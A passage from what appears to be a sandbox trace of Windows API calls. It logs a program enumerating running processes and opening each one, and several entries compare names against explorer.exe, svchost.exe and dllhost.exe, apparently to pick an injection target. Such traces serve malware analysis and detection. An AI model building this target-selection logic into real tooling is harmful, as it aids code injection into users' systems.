out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0188.365] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0188.367] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0188.367] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0188.368] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0188.368] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0188.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0188.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0188.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0188.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0188.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0188.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0188.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0188.372] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0188.372] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0188.373] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0188.373] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0188.374] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0188.374] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0188.375] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0188.375] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.375] CloseHandle (hObject=0xd8) returned 1 [0188.376] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0188.376] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0188.376] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0188.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0188.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0188.377] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.377] CloseHandle (hObject=0xd8) returned 1 [0188.377] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0188.377] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0188.377] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0188.377] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0188.377] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0188.378] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0188.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0188.378] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.378] CloseHandle (hObject=0xd8) returned 1 [0188.378] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0188.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0188.379] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.379] CloseHandle (hObject=0xd8) returned 1 [0188.379] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0188.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0188.380] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.380] CloseHandle (hObject=0xd8) returned 1 [0188.380] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0188.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0188.380] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.380] CloseHandle (hObject=0xd8) returned 1 [0188.380] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0188.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0188.381] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.381] CloseHandle (hObject=0xd8) returned 1 [0188.381] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0188.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0188.381] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.381] CloseHandle (hObject=0xd8) returned 1 [0188.381] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0188.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0188.382] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.382] CloseHandle (hObject=0xd8) returned 1 [0188.382] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0188.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0188.382] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.382] CloseHandle (hObject=0xd8) returned 1 [0188.383] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0188.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0188.383] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.383] CloseHandle (hObject=0xd8) returned 1 [0188.383] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0188.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0188.384] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.384] CloseHandle (hObject=0xd8) returned 1 [0188.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0188.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0188.384] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.384] CloseHandle (hObject=0xd8) returned 1 [0188.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0188.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0188.385] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.385] CloseHandle (hObject=0xd8) returned 1 [0188.385] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0188.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0188.385] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.385] CloseHandle (hObject=0xd8) returned 1 [0188.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0188.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0188.386] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.386] CloseHandle (hObject=0xd8) returned 1 [0188.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0188.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0188.387] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.387] CloseHandle (hObject=0xd8) returned 1 [0188.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0188.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0188.387] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.387] CloseHandle (hObject=0xd8) returned 1 [0188.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0188.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0188.388] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.388] CloseHandle (hObject=0xd8) returned 1 [0188.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0188.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0188.388] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.388] CloseHandle (hObject=0xd8) returned 1 [0188.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0188.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0188.389] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.389] CloseHandle (hObject=0xd8) returned 1 [0188.389] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0188.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0188.390] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.390] CloseHandle (hObject=0xd8) returned 1 [0188.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0188.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0188.390] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.390] CloseHandle (hObject=0xd8) returned 1 [0188.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0188.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0188.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0188.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0188.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0188.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0188.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0188.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0188.394] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.394] CloseHandle (hObject=0xd8) returned 1 [0188.394] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0188.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0188.395] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.395] CloseHandle (hObject=0xd8) returned 1 [0188.395] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0188.395] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0188.395] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0188.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.395] OpenProcess 